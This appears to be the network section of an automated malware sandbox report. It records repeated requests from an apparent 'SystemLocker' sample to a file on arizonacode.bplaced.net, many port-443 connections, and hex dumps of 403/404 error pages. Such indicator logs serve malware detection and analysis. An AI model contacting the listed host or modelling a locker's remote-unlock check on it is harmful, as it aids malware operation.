        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
        Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
        Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
        Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccept-CH: Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECTAccept-CH-Lifetime: 31536000Cache-Control: no-cache,no-store,max-age=0,must-revalidateConnection: CloseContent-Length: 17232Content-Security-Policy-Report-Only: connect-src https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.admetrica.ru https://mc.yandex.ru https://yabs.yandex.ru https://yandex.ru;default-src 'none';frame-src https://*.ya.ru https://*.yandex.ru https://mc.yandex.md https://mc.yandex.ru https://ya.ru https://yandex.ru;img-src 'self' data: https://*.mc.yandex.ru https://*.verify.yandex.ru https://*.ya.ru https://*.yandex.ru https://adstat.yandex.ru https://avatars.mds.yandex.net https://favicon.yandex.net https://mc.admetrica.ru https://mc.yandex.com https://mc.yandex.ru https://ya.ru https://yabs.yandex.ru https://yandex.ru https://yastatic.net;report-uri https://csp.yandex.net/csp?project=morda&from=morda.intercept404.ru&showid=1664455798.03116.95800.77213&h=stable-morda-any-sas-yp-9&yandexuid=8210726791664455798;script-src 'unsafe-inline' https://*.mc.yandex.ru https://adstat.yandex.ru https://mc.yandex.ru https://yandex.ru https://yastatic.net;style-src 'unsafe-inline' https://yastatic.netContent-Type: text/html; charset=UTF-8Date: Thu, 29 Sep 2022 12:49:58 GMTExpires: Thu, 29 Sep 2022 12:49:58 GMTLast-Modified: Thu, 29 Sep 2022 12:49:58 GMTNEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}Set-Cookie: i=mzwIFKdMjJYbMlcq4dxyb2QmAinwt40crUN3pWwnWfp03/WaPvZSdcXT26wgvuCtCyKkTww1dDT4y6FhQBmah1uYfeI=; Expires=Sat, 28-Sep-2024 12:49:58 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnlyVary: Cookie,Accept-Language,Accept-EncodingX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=block
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:49:19 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=107X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1597Date: Thu, 29 Sep 2022 12:49:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 12:50:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 29 Sep 2022 12:50:12 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:14 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=106X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: UpgradeLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 12:50:15 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=142X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 